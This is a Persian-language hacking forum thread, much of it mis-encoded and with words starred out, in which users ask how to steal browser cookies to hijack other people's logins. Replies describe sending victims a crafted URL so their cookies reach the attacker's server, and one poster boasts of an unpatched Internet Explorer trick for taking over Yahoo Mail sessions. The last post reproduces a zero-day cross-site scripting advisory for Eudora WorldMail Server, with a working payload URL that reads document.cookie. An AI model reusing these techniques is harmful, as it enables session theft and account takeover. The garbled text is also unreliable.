اطلاعیه

Collapse
No announcement yet.

How Use ****ie ?

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • How Use ****ie ?

    ÈÇ ÓáÇã ÎÏãÊ ÏæÓÊÇä ÚÒیÒ

    ãی ÎæÇÓÊã ÈÏæäã ˜å ãÇ ØæÑی ãی Êæäیã ÇÒ ˜æ˜ی åÇ ÈÑÇی å˜ ˜ÑÏä ÇÓÊÝÇÏå ˜äیã

    ÈÇ ÊÔ˜Ñ
    ;)
    آن کَس كه بر در می کوبد شباهنگام
    به كشتن چراغ آمده است
    نور را در پستوي خانه نهان بايد كرد ...

  • #2
    Salam.

    Doste khob...feker konam az Ettelaati keh dar file hayeh ****i ha Sabt mishan bakhabari....

    Behtarin Soee estefadee keh mitone beshe,,
    fahmindan list site hayee keh shoma be ona miri va aghe to on site az user password ee wared mikonee ..... in user pass ro file ****i sabt mishe.. albate aksare site ha in ejazaro be karbar midan keh in kar ba entekhab anjam she..maslan Site shabgard org in karo to halate defaultesh anjam mide..yani yeh bar keh user passwordeto dadi bara bare dowom nemikhad.. in kar ba ghereftan user va password Hash shodeyeh shoma anjam mishe........

    hala... aghe ba ye Bug beshe in ****i ro ro systeme khodet Enteghal bedi... mitonee be rahati be jayeh on fard warede siteee beshi keh on taraf be on ozve........

    hala...
    bahse ghereftane ****i.. khodesh yeh bahse kameleiye...

    va akhiran in BUG Explorer.. kar daste khaliya dade keh feker konam baziya hessesh kardan !!!!


    :D
    http://blxk.shabgard.org

    Comment


    • #3
      ÈÇ ÓáÇã

      ãåäÏÓ ˜ÇÑÊ Îیáی ÏÑÓÊå
      :D

      ÂÞÇ ãäã ÓÑ åãیä یÑã ˜å ÍÇáÇ ãËáÇ ãÇ یå Èǐ یÑ ÂæÑÏیã æ ÈÇ ÇÓÊÝÇÏå ÇÒ Çæä یå ˜æ˜ی یÑ ÂæÑÏیã
      ØæÑ Çæä ˜æ˜ی Ñæ Èå ÓیÓÊããæä æÇÑÏ ˜äیã æ ÇÒÔ ÇÓÊÝÇÏå ˜äیã
      ;)
      آن کَس كه بر در می کوبد شباهنگام
      به كشتن چراغ آمده است
      نور را در پستوي خانه نهان بايد كرد ...

      Comment


      • #4
        ÈÇÈÇ ÊæÑæ ÎÏÇ ی˜ی ÌæÇÈ ÈÏå
        :rolleyes: :rolleyes:
        آن کَس كه بر در می کوبد شباهنگام
        به كشتن چراغ آمده است
        نور را در پستوي خانه نهان بايد كرد ...

        Comment


        • #5
          re

          i think its your Owen Coockie


          u can send your url to victum and when he or she see this...that coockie Store in Your Server and u can Used it;)

          c u l
          ...

          Comment


          • #6
            ÈÇ ÓáÇã

            ãåäÏÓ ãÇ åã Çیäæ ÝåãیÏیã
            ÇãÇ ãä ÓæÇáã Çیäå ˜å ØæÑ ÇÒ Çæä ˜æ˜ی ÇÓÊÝÇÏå ˜äیã
            ÈÇ ÊÔ˜Ñ

            ;)
            آن کَس كه بر در می کوبد شباهنگام
            به كشتن چراغ آمده است
            نور را در پستوي خانه نهان بايد كرد ...

            Comment


            • #7
              ;)

              Salam mohandes...ini ro ke mikhai man taghriban parsal barnamash ro neveshtam...moteasefane yeki nist be in microsofte ahmagh bege ke in buge hijack ****ie ro pach kone..albate nage behtare;) ta alanesh ke man daram in post ro minevisam ravesham kar mikone...****ie ro ba ye asp az tooye buffer haye ie mikhoonam o to ye file txt minevisam...bad mohtaviyate oon ro to ye ghesmat az hafzeye ie ke age daghighe ro bekhai behet migam mizaram...hamin!hala mizany mail.yahoo.com va tooye mail boxe tarafy..passwordesham avaz kone bazam kar mikone...hich rahy nadare moteasefane ya khosbakhtane)

              Comment


              • #8
                How Use !!!

                í˜í ÇÒ 1000 ÊÇ ÑæÔ ãæÌæÏ
                í˜ã ÊÇÑíÎ ÐÔÊå ÔÏ ..



                De******ion: An input validation vulnerability was reported in the Eudora WorldMail Server. A remote user can conduct cross-site ******ing attacks against e-mail users.

                exploitlabs.com reported that a search feature does not filter HTML code from user-supplied input when displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary ******ing code to be executed by the target user's browser. The code will originate from the site running the Eudora WorldMail Server software and will run in the security context of that site. As a result, the code will be able to access the target user's ****ies (including authentication ****ies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.



                http://[host]:8888/c%3dAE?%3FO=%3C******%3Ealert%28document.****ie%29 %3B%3C% 2F******%3E


                Impact: A remote user can access the target user's ****ies (including authentication ****ies), if any, associated with the site running the Eudora WorldMail Server software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target use

                Çíäã ÇÕá Þʐæ


                VUNERABILITY / EXPLOIT
                ======================


                Vunerable hosts display the following:

                -------------- snip ----------------------


                A convenient hypertext interface to LDAP and X.500 Directories.


                Local domains and aliases

                Results for: entries at the top level


                Name De******ion
                Countries
                AE <---------------- example country
                IT
                CA
                --------------- snip --------------------

                Select a country ( "AE" used as example )
                you should see something like the following..

                http://[host]:8888/c%3dAE

                and a search box

                "One-level search in AE:"

                <FORM METHOD=GET ACTION="/c%3dAE">
                <A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
                <INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
                <INPUT TYPE=reset VALUE="Clear"></FORM>

                enter sum cool XSS...

                <******>alert(document.****ie);</******>


                and get

                http://[host]:8888/c%3dAE?%3FO=%3C******%3Ealert%28document.****ie%29 %3B%3C%2F******%3E


                the results are rendered by the output of the formatted html.

                yes, it just a non persistant XSS, but this is running as a service on
                port 8888 and is a mail processing server, so there may be other issues
                ( DoS ? ) as well.



                I belive LDAP has some DCOM connectivity as well, and there could be issies
                with the LDAP...

                SLAPD or X.500 Error: Not found
                An error occurred while searching the SLAPD or X.500 directory
                The error code was 32:

                No such object.
                No additional information is available.Please report errors to the
                Administrator.



                Local:
                ------
                ???

                Remote:
                -------
                yes

                Vendor Fix:
                -----------
                No fix on 0day
                http://blxk.shabgard.org

                Comment

                Working...
                X